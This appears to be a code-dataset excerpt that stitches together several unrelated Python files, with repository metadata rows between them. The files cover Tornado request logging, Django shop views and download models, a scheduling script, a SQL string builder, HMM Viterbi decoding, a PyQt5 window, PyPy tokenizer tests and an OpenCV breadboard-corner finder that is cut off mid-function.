    Stage = namedtuple('Stage', ('name', 'delta', 'start_delta'))
    def __init__(self, request, request_id):
        self._handler = None
        # both timers start at the moment tornado created the request
        self._last_stage_time = self._start_time = request._start_time
        super(RequestLogger, self).__init__(PerRequestLogBufferHandler('frontik.handler'), {'request_id': request_id})
        self.stages = []
        # backcompatibility with logger
        self.warn = self.warning
        self.addHandler = self.logger.addHandler
        if options.graylog:
            self.logger.add_bulk_handler(
                BulkGELFHandler(options.graylog_host, options.graylog_port, LAN_CHUNK, False)
            )
    def register_handler(self, handler):
        # remember the page handler so log lines can reference it
        self._handler = handler
        self.extra['handler'] = handler
    def stage_tag(self, stage_name):
        """Close the current timing stage and record it as *stage_name*."""
        stage_end_time = time.time()
        stage_start_time = self._last_stage_time
        self._last_stage_time = stage_end_time
        delta = (stage_end_time - stage_start_time) * 1000
        start_delta = (stage_start_time - self._start_time) * 1000
        stage = RequestLogger.Stage(stage_name, delta, start_delta)
        self.stages.append(stage)
        self.debug('stage "%s" completed in %.2fms', stage.name, stage.delta, extra={'_stage': stage})
    def get_current_total(self):
        # total time in ms spent in all closed stages so far
        return sum(s.delta for s in self.stages)
    def log_stages(self, status_code):
        """Writes available stages, total value and status code"""
        stages_str = ' '.join('{s.name}={s.delta:.2f}'.format(s=s) for s in self.stages)
        total = sum(s.delta for s in self.stages)
        self.info(
            'timings for %(page)s : %(stages)s',
            {
                'page': repr(self._handler),
                'stages': '{0} total={1:.2f} code={2}'.format(stages_str, total, status_code)
            },
        )
    def process(self, msg, kwargs):
        # LoggerAdapter hook: merge the per-request context into record extras
        if 'extra' in kwargs:
            kwargs['extra'].update(self.extra)
        else:
            kwargs['extra'] = self.extra
        return msg, kwargs
    def add_bulk_handler(self, handler, auto_flush=True):
        self.logger.add_bulk_handler(handler, auto_flush)
    def request_finish_hook(self, status_code, request_method, request_uri):
        # flush buffered records to bulk handlers along with the request summary
        self.logger.flush(status_code=status_code, stages=self.stages, method=request_method, uri=request_uri)
def bootstrap_logging():
    """This is a replacement for standard Tornado logging configuration.

    Configures the root logger from tornado ``options``: an optional
    watched-file handler, an stderr handler and a syslog handler, then
    silences the loggers listed in ``options.suppressed_loggers``.
    """
    root_logger = logging.getLogger()
    level = getattr(logging, options.loglevel.upper())
    # the root logger passes everything; individual handlers filter by level
    root_logger.setLevel(logging.NOTSET)
    if options.logfile:
        # WatchedFileHandler reopens the file after external log rotation
        handler = logging.handlers.WatchedFileHandler(options.logfile)
        handler.setFormatter(logging.Formatter(options.logformat))
        handler.setLevel(level)
        root_logger.addHandler(handler)
    if options.stderr_log:
        if hasattr(tornado.options, 'enable_pretty_logging'):
            # Old Tornado version
            tornado.options.enable_pretty_logging(level)
        else:
            from tornado.log import LogFormatter
            handler = logging.StreamHandler()
            handler.setFormatter(
                LogFormatter(
                    fmt=tornado.options.options.stderr_format, datefmt=tornado.options.options.stderr_dateformat
                )
            )
            handler.setLevel(level)
            root_logger.addHandler(handler)
    if options.syslog:
        try:
            syslog_handler = SysLogHandler(
                facility=SysLogHandler.facility_names[options.syslog_facility],
                address=options.syslog_address
            )
            syslog_handler.setFormatter(logging.Formatter(options.logformat))
            syslog_handler.setLevel(level)
            root_logger.addHandler(syslog_handler)
        except socket.error:
            # syslog socket unavailable -- report it but keep running
            logging.getLogger('frontik.logging').exception('cannot initialize syslog')
    # quiet down noisy loggers named in configuration
    for logger_name in options.suppressed_loggers:
        logging.getLogger(logger_name).setLevel(logging.WARN)
| nekanek/frontik-without-testing | frontik/frontik_logging.py | frontik_logging.py | py | 7,857 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "graypy.handler.GELFHandler",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "time.strftime",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "time.localtime",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "copy.deepcopy... |
11425267400 | from django.shortcuts import render, redirect
from .models import Product, SliderImage, Guest, CartItem
from django.http import HttpResponse
from django.db.models import Q
def home(request):
    """Store front page: product grid plus slider, with optional
    search / category / brand filters from the query string."""
    slides = SliderImage.objects.all()
    products = Product.objects.all()
    search = request.GET.get('search')
    if search:
        products = Product.objects.filter(Q(name__icontains=search))
    category = request.GET.get('category')
    if category:
        products = products.filter(category=category)
    brand = request.GET.get('brand')
    if brand:
        products = products.filter(brand=brand)
    return render(request, 'home.html', {'products': products, 'slides': slides})
def product(request, pk):
    """Detail page for the product with the given primary key."""
    return render(request, 'product.html', {'product': Product.objects.get(pk=pk)})
def guest_register(request, pk):
    """Add product *pk* to the current visitor's cart, then redirect home.

    A Guest record keyed by the CSRF cookie is created on first use. If
    the product is already in this guest's cart, its quantity is
    incremented instead of creating a duplicate item.
    """
    token = request.COOKIES['csrftoken']
    guest = Guest.objects.filter(token=token).first()
    if guest is None:
        guest = Guest.objects.create(token=token)
    # BUG FIX: the lookup must be scoped to this guest; filtering on the
    # product alone matched (and incremented) other visitors' cart items.
    cart_item = CartItem.objects.filter(product=pk, guest=guest).first()
    if cart_item is None:
        CartItem.objects.create(
            guest = guest,
            product = Product.objects.get(pk=pk),
            quantity = 1,
            customer = request.user if request.user.is_authenticated else None
        )
    else:
        # BUG FIX: indexing the queryset twice (cart_item[0]... twice)
        # fetched two different instances, so the incremented quantity
        # was never the one saved.
        cart_item.quantity += 1
        cart_item.save()
    return redirect('store:home')
def cart(request):
token = request.COOKIES['csrftoken']
guest = Guest.objects.filter(token=token)
if request.user.is_authenticated:
cart_items = CartItem.objects.filter(customer=request.user)
else:
cart_items = CartItem.objects.filter(guest=guest[0]) if guest else []
return render(request, 'cart.html', {'cart_items': cart_items}) | MairaAllen/django--------3 | top/store/views.py | views.py | py | 1,860 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "models.Product.objects.all",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "models.Product.objects",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "models.Product",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "mo... |
3050296786 | # coding=utf-8
"""Csv download model definition.
"""
from datetime import datetime
from django.db import models
from django.conf import settings
from django.core.exceptions import ValidationError
from bims.api_views.csv_download import (
send_csv_via_email,
send_rejection_csv,
send_new_csv_notification
)
def validate_file_extension(value):
    """Validate that an uploaded file has a .csv extension.

    Args:
        value: an uploaded-file-like object exposing a ``name`` attribute.

    Raises:
        ValidationError: if the extension is not .csv (case-insensitive).
    """
    import os
    ext = os.path.splitext(value.name)[1]
    # Compare case-insensitively so 'DATA.CSV' is accepted as well; the
    # original exact match rejected upper-case extensions.
    if ext.lower() not in ('.csv',):
        raise ValidationError('File not supported!')
class DownloadRequest(models.Model):
    """A user's request to download data as a CSV file.

    Tracks the review workflow: a request starts in ``processing``; an admin
    then either approves it (the CSV is emailed to the requester) or rejects
    it (a rejection message is emailed instead).
    """
    # Who asked for the download; rows are removed when the user is deleted.
    requester = models.ForeignKey(
        settings.AUTH_USER_MODEL,
        models.CASCADE,
        related_name='download_request_requester',
        blank=False,
        null=False,
    )
    # NOTE(review): datetime.now is timezone-naive; if USE_TZ is enabled,
    # django.utils.timezone.now may be intended — confirm project settings.
    request_date = models.DateTimeField(
        default=datetime.now
    )
    # The generated CSV itself; the validator only accepts a .csv extension.
    request_file = models.FileField(
        upload_to='request-files/',
        help_text='Only csv file',
        null=True,
        max_length=300,
        validators=[validate_file_extension]
    )
    # Workflow flags: processing -> approved, or processing -> rejected.
    processing = models.BooleanField(
        default=True
    )
    approved = models.BooleanField(
        default=False
    )
    request_category = models.CharField(
        max_length=256,
        default=''
    )
    rejected = models.BooleanField(
        default=False
    )
    # Free-text reason shown to the requester when the request is rejected.
    rejection_message = models.TextField(
        null=True,
        blank=True
    )
    def get_formatted_name(self):
        """Return the requester's formatted full name, e.g. 'Maupetit J'.

        Falls back to the username when no first/last name is set.
        """
        if self.requester.first_name or self.requester.last_name:
            return '%s %s' % (
                self.requester.first_name, self.requester.last_name)
        return self.requester.username
    # noinspection PyClassicStyleClass
    class Meta:
        """Meta class for project."""
        app_label = 'bims'
        verbose_name_plural = 'Download requests'
        verbose_name = 'Download request'
        ordering = ('-request_date',)
    def __str__(self):
        """Human-readable summary: requester, time of request, category."""
        return '{requester} - {date} - {category}'.format(
            requester=self.requester,
            date=self.request_date.strftime('%H:%M:%S'),
            category=self.request_category
        )
    def save(self, *args, **kwargs):
        """Persist the request, emailing notifications on state transitions."""
        old_obj = None
        # Brand-new request (not yet in the DB): notify staff by email.
        if self._state.adding:
            send_new_csv_notification(
                self.requester,
                self.request_date
            )
        if self.id:
            old_obj = DownloadRequest.objects.get(id=self.id)
        # Approval transition: email the CSV once `approved` flips to True.
        if old_obj and not self.processing and not self.rejected:
            if self.approved and self.approved != old_obj.approved:
                # send email
                send_csv_via_email(
                    self.requester,
                    self.request_file.path,
                    self.request_category,
                    approved=True
                )
        # Rejection path: email the rejection message to the requester.
        elif self.rejected and not self.approved and not self.processing:
            send_rejection_csv(
                self.requester,
                self.rejection_message
            )
        super(DownloadRequest, self).save(*args, **kwargs)
| anhtudotinfo/django-bims | bims/models/download_request.py | download_request.py | py | 3,152 | python | en | code | null | github-code | 36 | [
{
"api_name": "os.path.splitext",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "django.core.exceptions.ValidationError",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "... |
25250856119 | import argparse
import imgkit
import sched
from datetime import datetime, timedelta
from pytz import timezone
from random import randint
from time import sleep, time
from availability_checker import AvailabilityChecker
from config.configuration import SLEEP_TIME, REPORT_HOUR
TIMEZONE = timezone('EST')
def when_to_generate_report(now):
    """Return tomorrow's report moment at REPORT_HOUR in the configured zone."""
    next_day = now + timedelta(days=1)
    return datetime(next_day.year, next_day.month, next_day.day,
                    REPORT_HOUR, 0, 0, tzinfo=TIMEZONE)
def seconds_until_next_report(now):
    """Get the number of seconds until the specified hour of the day, tomorrow. """
    # NOTE(review): timedelta.seconds keeps only the within-day remainder and
    # discards the days component, so when the target moment is more than 24h
    # away this effectively yields the delay to the *next* occurrence of
    # REPORT_HOUR rather than tomorrow's, contradicting the docstring.
    # Confirm whether (...).total_seconds() was intended.
    return (when_to_generate_report(now) - now).seconds
parser = argparse.ArgumentParser("availability_checker")
parser.add_argument("--clear", help="boolean whether or not to clear the db file before checking status", type=bool)
parser.set_defaults(clear=False)
args = parser.parse_args()
availability_checker = AvailabilityChecker()
availability_checker.initialize(clear=args.clear)
# Add a jitter to the sleep time, between 1 second and 30 seconds (or the sleep time if its less than 30 seconds)
sleep_delta = randint(1, min(30, SLEEP_TIME))
sleep_time = SLEEP_TIME + sleep_delta
scheduler = sched.scheduler(time, sleep)
def check_availability(sc):
    """Run one availability check, then re-schedule this task."""
    availability_checker.check_game_availability()
    print(f"Sleeping for {sleep_time} seconds... \n\n")
    scheduler.enter(sleep_time, 1, check_availability, (sc,))
def get_status_report(sc):
    """Send the daily status notification and schedule the next report."""
    availability_checker.send_game_status_notification()
    current = datetime.now(TIMEZONE)
    next_report_at = when_to_generate_report(current)
    delay = seconds_until_next_report(current)
    print(f"Sleeping until next daily report at {next_report_at} ({int(delay/60/60)} hours from now)... \n\n")
    scheduler.enter(delay, 1, get_status_report, (sc,))
scheduler.enter(0, 1, check_availability, (scheduler,))
scheduler.enter(0, 1, get_status_report, (scheduler,))
scheduler.run()
| colecanning/hockey_availability_trigger | run_checks.py | run_checks.py | py | 2,061 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "pytz.timezone",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "datetime.timedelta",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "config.configurati... |
34053641545 | from datetime import datetime, date
import pickle as pickle
def stringfy(value, dbtype) -> str:
    """Render a Python value as a SQL literal for the given database dialect.

    Strings are backslash-escaped and quoted; the quote character itself is
    escaped as \\' for MySQL and doubled ('') for other dialects. datetime and
    date values are quoted; None becomes the unquoted keyword Null; everything
    else is rendered via str().

    Improvements over the original: `is None` instead of `== None`,
    isinstance() instead of strict type() equality (so str/datetime subclasses
    are handled), and the duplicated escape lists are merged.
    """
    if value is None:
        return 'Null'
    if isinstance(value, str):
        # Backslash must be escaped first so later inserted escapes survive.
        symbols = ['\\', '"', "(", ")", "%", '&', '@', '*', '[', ']', '{', '}', '^', '!', '/', '-', '+', '?', ';', '~', '|']
        for symbol in symbols:
            value = value.replace(symbol, '\\' + symbol)
        if dbtype == 'mysql':
            value = value.replace("'", "\\'")
        else:
            # ANSI-style dialects escape a quote by doubling it.
            value = value.replace("'", "''")
        return f"'{value}'"
    if isinstance(value, (datetime, date)):
        return f"'{value}'"
    return f'{value}'
class CreateSql:
    """Build a CREATE TABLE statement from a pydantic-style model class."""

    def __init__(self, model):
        self.table_name = model.__name__
        self.fields = list(model.__fields__.keys())

    def get_create(self, **customType):
        """Return CREATE TABLE SQL; customType maps each field to a SQL type."""
        columns = [f'{name} {sqltype}'
                   for name, sqltype in zip(self.fields, customType.values())]
        sql = f'CREATE TABLE {self.table_name} ({", ".join(columns)})'
        print(f'create sql : \n {sql}')
        return sql
class InsertSql:
    """Build INSERT statements from pydantic-style model instances."""

    def __init__(self, model):
        self.table_name = model.__name__
        self.fields = list(model.__fields__.keys())

    def get_values_part(self, data, dbtype):
        """Render one row (via data.dict()) as a parenthesised SQL tuple."""
        rendered = [stringfy(value=v, dbtype=dbtype) for v in data.dict().values()]
        return f'({", ".join(rendered)})'

    def get_values_parts(self, dataset, dbtype):
        """Render several rows as a comma-separated list of SQL tuples."""
        return ', '.join(self.get_values_part(data=row, dbtype=dbtype)
                         for row in dataset)

    def get_insert(self, data, dbtype='mysql'):
        """Return an INSERT statement for a single row."""
        fields_part = ', '.join(self.fields)
        sql = f'INSERT INTO {self.table_name} ({fields_part}) VALUES{self.get_values_part(data=data, dbtype=dbtype)}'
        print(f'insert sql : \n {sql}')
        return sql

    def get_dump(self, dataset, dbtype='mysql'):
        """Return a bulk INSERT statement covering every row in `dataset`."""
        fields_part = ', '.join(self.fields)
        sql = f'INSERT INTO {self.table_name} ({fields_part}) VALUES{self.get_values_parts(dataset=dataset, dbtype=dbtype)}'
        print(f'dump sql : \n {sql[:250]}')
        return sql
| ajcltm/Isql_v2 | Isql_v2/sql.py | sql.py | py | 2,592 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.datetime",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "datetime.date",
"line_number": 18,
"usage_type": "name"
}
] |
15655252113 | # -*- coding: utf-8 -*-
"""
Created on Sat Oct 13 17:04:34 2018
@author: ecupl
"""
import numpy as np
import pandas as pd
import os,copy
import matplotlib.pyplot as plt
#######################
# #
# HMM最优路径 #
# #
#######################
os.chdir(r"D:\mywork\test")
'''1、近似算法'''
#初始准备
startP = np.array([[0.63,0.17,0.20]])
transformP = np.array([[0.5,0.375,0.125],[0.25,0.125,0.625],[0.25,0.375,0.375]])
observeP = np.array([[0.6,0.2,0.15,0.05],[0.25,0.25,0.25,0.25],[0.05,0.1,0.35,0.5]])
stateArray = ["晴天","阴天","雨天"]
observeArray = ["干旱","干燥","湿润","潮湿"]
#开始循环计算
stateResult = []
observeResult = ["干旱","干燥","潮湿"]
for idx in range(len(observeResult)):
stateDict = {}
if idx==0:
observeIdx = observeArray.index(observeResult[idx])
stateP = np.multiply(startP,observeP[:,observeIdx])
state = stateArray[np.argmax(stateP)]
else:
for i in stateResult[idx-1].values():
stateForward = i
observeIdx = observeArray.index(observeResult[idx])
stateP = np.multiply(np.dot(stateForward,transformP),observeP[:,observeIdx])
state = stateArray[np.argmax(stateP)]
stateDict[state] = stateP
stateResult.append(stateDict)
'''2、Vertibi维特比算法'''
def vertibi(observeResult,startP,transformP,observeP,stateArray,observeArray):
    '''
    Viterbi decoding for an HMM: for each observation, compute and print the
    most likely hidden state along the best path.

    observeResult: the actual observation sequence (list of observation names)
    startP: initial state probabilities (assumed shape (1, n_states) — row vector)
    transformP: state-transition probability matrix (n_states, n_states)
    observeP: emission probability matrix (n_states, n_observations)
    stateArray: hidden-state names, aligned with the rows of transformP
    observeArray: observation names, aligned with the columns of observeP

    Side effects only: prints the per-step best states and path probabilities;
    returns None.
    '''
    stateP = []  # per-step dicts: state name -> best path probability
    state = []   # per-step dicts: observation -> most likely state
    for idx in range(len(observeResult)):
        statePdict = dict()
        statedict = dict()
        if idx==0:
            # Initial step: start distribution times emission probability.
            observeIdx = observeArray.index(observeResult[idx])
            tempstateP = np.multiply(startP,observeP[:,observeIdx]).reshape(-1)
        else:
            # Recursion: for each state keep the best predecessor — max over
            # (previous probabilities broadcast against the transition matrix).
            stateForwardP = np.array(list(stateP[idx-1].values())).reshape(-1,1)
            observeIdx = observeArray.index(observeResult[idx])
            statePro = np.multiply(stateForwardP,transformP).max(axis=0)
            tempstateP = np.multiply(statePro,observeP[:,observeIdx])
            print(statePro,observeP[:,observeIdx])
        for i in range(len(tempstateP)):
            statePdict[stateArray[i]] = tempstateP[i]
        # Record the most likely state for this observation.
        statedict[observeResult[idx]] = stateArray[np.argmax(tempstateP)]
        stateP.append(statePdict),state.append(statedict)
    print(state,stateP)
#######################
# #
# HMM词性标注 #
# #
#######################
import jieba
'''不带词性'''
sen = jieba.cut("把这篇报道修改一下")
for x in sen:
print(x)
'''带词性'''
import jieba.posseg
sen2 = jieba.posseg.cut("把这篇报道修改一下")
for i in sen2:
print(i.word,i.flag)
| shoucangjia1qu/Machine-Learnning1 | Machine Learning 0217 charpter11.py | Machine Learning 0217 charpter11.py | py | 2,970 | python | en | code | 6 | github-code | 36 | [
{
"api_name": "os.chdir",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 23,... |
7666619166 | from PyQt5 import QtWidgets, QtCore, QtGui
from UI import Ui_MainWindow
import sys
import images
import core
from database import SessionLocal, engine
from models import APP, Group, Function
# 创建数据库表
APP.metadata.create_all(bind=engine)
Group.metadata.create_all(bind=engine)
Function.metadata.create_all(bind=engine)
class MainWindow(QtWidgets.QMainWindow):
    """Main application window: wires cascading combo boxes and confirms exit."""
    def __init__(self):
        super().__init__()
        self.ui = Ui_MainWindow()
        self.ui.setupUi(self)
        # Connect comboBox's currentIndexChanged signal to change_combox2.
        self.ui.comboBox.currentIndexChanged.connect(self.change_combox2)
        # Connect comboBox_2's currentIndexChanged signal to change_combox3.
        self.ui.comboBox_2.currentIndexChanged.connect(self.change_combox3)
    def change_combox2(self):
        """Repopulate comboBox_2 (and reset comboBox_3) after comboBox changes."""
        # Clear comboBox_2 and comboBox_3 before repopulating.
        self.ui.comboBox_2.clear()
        self.ui.comboBox_3.clear()
        core.comboBox_2_function(self.ui)
    def change_combox3(self):
        """Repopulate comboBox_3 after comboBox_2 changes."""
        # Clear comboBox_3 before repopulating.
        self.ui.comboBox_3.clear()
        core.comboBox_3_function(self.ui)
    def closeEvent(self, event):
        """Ask for confirmation before closing the main window."""
        try:
            reply = QtWidgets.QMessageBox.question(self, '提醒', "是否要退出程序?",
                                                   QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No,
                                                   QtWidgets.QMessageBox.No)
            if reply == QtWidgets.QMessageBox.Yes:
                event.accept()
                print("主窗口已关闭")
            else:
                event.ignore()
        except Exception as e:
            # Best-effort: never let a dialog failure block window close.
            print(e)
if __name__ == "__main__":
    # Enable high-DPI scaling (works around blurry rendering on
    # high-resolution displays).
    QtCore.QCoreApplication.setAttribute(QtCore.Qt.AA_EnableHighDpiScaling)
    app = QtWidgets.QApplication(sys.argv)
    widget = MainWindow()
    ui = widget.ui
    # ui = Ui_MainWindow()
    # ui.setupUi(widget)
    widget.setWindowTitle("API-Explorer v1.0")
    widget.setWindowIcon(QtGui.QIcon(":/icon.ico"))
    widget.show()
    # Populate initial widget state before entering the event loop.
    core.key_function(ui)
    core.comboBox_function(ui)
    sys.exit(app.exec_())
| mrknow001/API-Explorer | main.py | main.py | py | 2,246 | python | en | code | 29 | github-code | 36 | [
{
"api_name": "models.APP.metadata.create_all",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "models.APP.metadata",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "models.APP",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "da... |
43296470854 | import pytest
from pypy.interpreter.pyparser import pytokenizer
from pypy.interpreter.pyparser.parser import Token
from pypy.interpreter.pyparser.pygram import tokens
from pypy.interpreter.pyparser.error import TokenError
def tokenize(s):
    """Tokenize source string `s`, appending a trailing newline sentinel."""
    lines = s.splitlines(True)
    return pytokenizer.generate_tokens(lines + ["\n"], 0)
def check_token_error(s, msg=None, pos=-1, line=-1):
    """Assert that tokenizing `s` raises TokenError with the given details.

    Any of msg/pos/line left at its default is not checked.
    """
    excinfo = pytest.raises(TokenError, tokenize, s)
    err = excinfo.value
    if msg is not None:
        assert err.msg == msg
    if pos != -1:
        assert err.offset == pos
    if line != -1:
        assert err.lineno == line
class TestTokenizer(object):
    """Unit tests for pytokenizer token generation and error reporting."""
    def test_simple(self):
        # A trivial expression tokenizes into NAME/PLUS/NUMBER plus the
        # synthetic NEWLINE/ENDMARKER trailer produced by the tokenizer.
        line = "a+1"
        tks = tokenize(line)
        assert tks == [
            Token(tokens.NAME, 'a', 1, 0, line),
            Token(tokens.PLUS, '+', 1, 1, line),
            Token(tokens.NUMBER, '1', 1, 2, line),
            Token(tokens.NEWLINE, '', 2, 0, '\n'),
            Token(tokens.NEWLINE, '', 2, 0, '\n'),
            Token(tokens.ENDMARKER, '', 2, 0, ''),
        ]
    def test_error_parenthesis(self):
        # Unclosed openers report the opening position...
        for paren in "([{":
            check_token_error(paren + "1 + 2",
                              "parenthesis is never closed",
                              1)
        # ...while unmatched closers report the closer's position.
        for paren in ")]}":
            check_token_error("1 + 2" + paren,
                              "unmatched '%s'" % (paren, ),
                              6)
        # Mismatched open/close pairs name both parentheses, including the
        # opener's line number when closer and opener sit on different lines.
        for i, opening in enumerate("([{"):
            for j, closing in enumerate(")]}"):
                if i == j:
                    continue
                check_token_error(opening + "1\n" + closing,
                                  "closing parenthesis '%s' does not match opening parenthesis '%s' on line 1" % (closing, opening),
                                  pos=1, line=2)
                check_token_error(opening + "1" + closing,
                                  "closing parenthesis '%s' does not match opening parenthesis '%s'" % (closing, opening),
                                  pos=3, line=1)
                check_token_error(opening + closing,
                                  "closing parenthesis '%s' does not match opening parenthesis '%s'" % (closing, opening),
                                  pos=2, line=1)
    def test_unknown_char(self):
        # A character outside the grammar's alphabet.
        check_token_error("?", "Unknown character", 1)
    def test_eol_string(self):
        # Unterminated single-quoted string: error at the opening quote.
        check_token_error("x = 'a", pos=5, line=1)
    def test_eof_triple_quoted(self):
        # Unterminated triple-quoted string at end of file.
        check_token_error("'''", pos=1, line=1)
| mozillazg/pypy | pypy/interpreter/pyparser/test/test_pytokenizer.py | test_pytokenizer.py | py | 2,472 | python | en | code | 430 | github-code | 36 | [
{
"api_name": "pypy.interpreter.pyparser.pytokenizer.generate_tokens",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "pypy.interpreter.pyparser.pytokenizer",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "pytest.raises",
"line_number": 11,
"usage_type"... |
22082345466 | #coding=utf-8
import cv2
import numpy as np
import scipy.signal as sp
from scipy import stats
import math
import os
def nothing(*arg):
    """No-op callback required by cv2.createTrackbar."""
    pass
def get_video():
    """Open the video source and build the control window with its trackbars.

    Returns (capture, locate_method, res) where res selects the working
    resolution: 1 = low (400x300), 2 = median (640x480), 3 = high (960x720).
    """
    # Alternative sources (locate_method 4): IP camera stream or webcam 0.
    #address = "http://admin:admin@10.189.149.245:8081" ; locate_method = 4
    #address = 0 ; locate_method = 4
    address = "pictures/video.mp4"
    locate_method = 1
    #res = 1  # low resolution, 400*300
    #res = 3  # high resolution, 960*720
    res = 2  # median resolution, 640*480
    video = cv2.VideoCapture(address)
    cv2.namedWindow("breadboard")
    cv2.createTrackbar('X_position', 'breadboard', 300, 600, nothing)
    cv2.createTrackbar('Y_position', 'breadboard', 30, 120, nothing)
    cv2.createTrackbar('Zoom', 'breadboard', 30, 50, nothing)
    return video, locate_method, res
class OBJ:
    def __init__(self, filename, swapyz=False):
        """Loads a Wavefront OBJ file.

        Parses vertices (v), normals (vn), texture coordinates (vt) and faces
        (f) into lists on the instance. When `swapyz` is true, the y and z
        components of vertices and normals are swapped. Each face is stored as
        (vertex_indices, normal_indices, texcoord_indices) with 1-based
        indices and 0 where a component is absent.
        """
        self.vertices = []
        self.normals = []
        self.texcoords = []
        self.faces = []
        material = None  # material handling is currently disabled (see below)
        for line in open(filename, "r"):
            if line.startswith('#'): continue  # skip comment lines
            values = line.split()
            if not values: continue  # skip blank lines
            if values[0] == 'v':
                # Geometric vertex: x y z
                v = list(map(float, values[1:4]))
                if swapyz:
                    v = v[0], v[2], v[1]
                self.vertices.append(v)
            elif values[0] == 'vn':
                # Vertex normal
                v = list(map(float, values[1:4]))
                if swapyz:
                    v = v[0], v[2], v[1]
                self.normals.append(v)
            elif values[0] == 'vt':
                # Texture coordinate: u v
                self.texcoords.append(list(map(float, values[1:3])))
            #elif values[0] in ('usemtl', 'usemat'):
                #material = values[1]
            #elif values[0] == 'mtllib':
                #self.mtl = MTL(values[1])
            elif values[0] == 'f':
                # Face: each element is vertex[/texcoord[/normal]].
                face = []
                texcoords = []
                norms = []
                for v in values[1:]:
                    w = v.split('/')
                    face.append(int(w[0]))
                    if len(w) >= 2 and len(w[1]) > 0:
                        texcoords.append(int(w[1]))
                    else:
                        texcoords.append(0)
                    if len(w) >= 3 and len(w[2]) > 0:
                        norms.append(int(w[2]))
                    else:
                        norms.append(0)
                #self.faces.append((face, norms, texcoords, material))
                self.faces.append((face, norms, texcoords))
def kernel(kernel_size=15):
    """Return a normalised kernel_size x kernel_size averaging (box) kernel."""
    return np.full((kernel_size, kernel_size), 1.0 / kernel_size ** 2)
def drawlines(img, rho, theta):
    """Draw the full extent of the Hough line (rho, theta) across `img`."""
    cos_t = np.cos(theta)
    sin_t = np.sin(theta)
    # Closest point of the line to the origin.
    x0, y0 = cos_t * rho, sin_t * rho
    # Extend 2000 px in both directions along the line.
    p1 = (int(x0 - 2000 * sin_t), int(y0 + 2000 * cos_t))
    p2 = (int(x0 + 2000 * sin_t), int(y0 - 2000 * cos_t))
    cv2.line(img, p1, p2, (255, 255, 255), 2)
def findcorners(img, rho1, rho2, theta, par2):
    """Locate the four breadboard corners on a binarised (0/255) image.

    rho1/rho2 are the Hough distances of the two long board edges and theta
    their shared angle; par2 is the image width. Two scan lines at 1/4 and
    3/4 of the way between the edges are walked outwards (coarse steps of 10,
    then refined by 1) until the white region ends; the four hits are then
    extrapolated outwards to the true corners.

    Returns a 4x2 array of (x, y) corners in the order:
    left-up, left-down, right-down, right-up.
    """
    coordinate_tem = np.zeros([4,2])
    coordinate = np.zeros([4,2])
    # Scan lines at 1/4 and 3/4 between the two long edges.
    rho4 = 0.25*rho1 + 0.75*rho2
    rho3 = 0.25*rho2 + 0.75*rho1
    a = np.cos(theta)
    b = np.sin(theta)
    x03 = a*rho3
    y03 = b*rho3
    x04 = a*rho4
    y04 = b*rho4
    # Starting x positions at 1/4 and 3/4 of the image width.
    x10 = int(par2/4)
    x20 = int(3*par2/4)
    y103 = int(y03 + (x10-x03)*(a)/(-b))
    y104 = int(y04 + (x10-x04)*(a)/(-b))
    y203 = int(y03 + (x20-x03)*(a)/(-b))
    y204 = int(y04 + (x20-x04)*(a)/(-b))
    x1 = x10
    y13 = int(y03 + (x1-x03)*(a)/(-b))
    y14 = int(y04 + (x1-x04)*(a)/(-b))
    x2 = x20
    y23 = int(y03 + (x2-x03)*(a)/(-b))
    y24 = int(y04 + (x2-x04)*(a)/(-b))
    #left up
    # Coarse walk left while on white, then step back right pixel by pixel.
    while img[y13][x1]==255.:
        x1-=10
        y13 = int(y03 + (x1-x03)*(a)/(-b))
    x1-=10
    if img[y13][x1]==0:
        x1+=11
        y13 = int(y03 + (x1-x03)*(a)/(-b))
        while img[y13][x1]==0:
            x1+=1
            y13 = int(y03 + (x1-x03)*(a)/(-b))
    else:
        print("error in left up")
    coordinate_tem[0][0] = x1
    coordinate_tem[0][1] = y13
    #left down
    x1 = x10
    while img[y14][x1]==255:
        x1-=10
        y14 = int(y04 + (x1-x04)*(a)/(-b))
    x1-=10
    if img[y14][x1]==0:
        x1+=11
        y14 = int(y04 + (x1-x04)*(a)/(-b))
        while img[y14][x1]==0:
            x1+=1
            y14 = int(y04 + (x1-x04)*(a)/(-b))
    else:
        print("error in left down")
    coordinate_tem[1][0] = x1
    coordinate_tem[1][1] = y14
    #right up
    while img[y23][x2]==255:
        x2+=10
        y23 = int(y03 + (x2-x03)*(a)/(-b))
    x2+=10
    if img[y23][x2]==0:
        x2-=11
        y23 = int(y03 + (x2-x03)*(a)/(-b))
        while img[y23][x2]==0:
            x2-=1
            y23 = int(y03 + (x2-x03)*(a)/(-b))
    else:
        print("error in right up")
    coordinate_tem[3][0] = x2
    coordinate_tem[3][1] = y23
    #right down
    x2 = x20
    while img[y24][x2]==255:
        x2+=10
        y24 = int(y04 + (x2-x04)*(a)/(-b))
    x2+=10
    if img[y24][x2]==0:
        x2-=11
        y24 = int(y04 + (x2-x04)*(a)/(-b))
        while img[y24][x2]==0:
            x2-=1
            y24 = int(y04 + (x2-x04)*(a)/(-b))
    else:
        print("error in right down")
    coordinate_tem[2][0] = x2
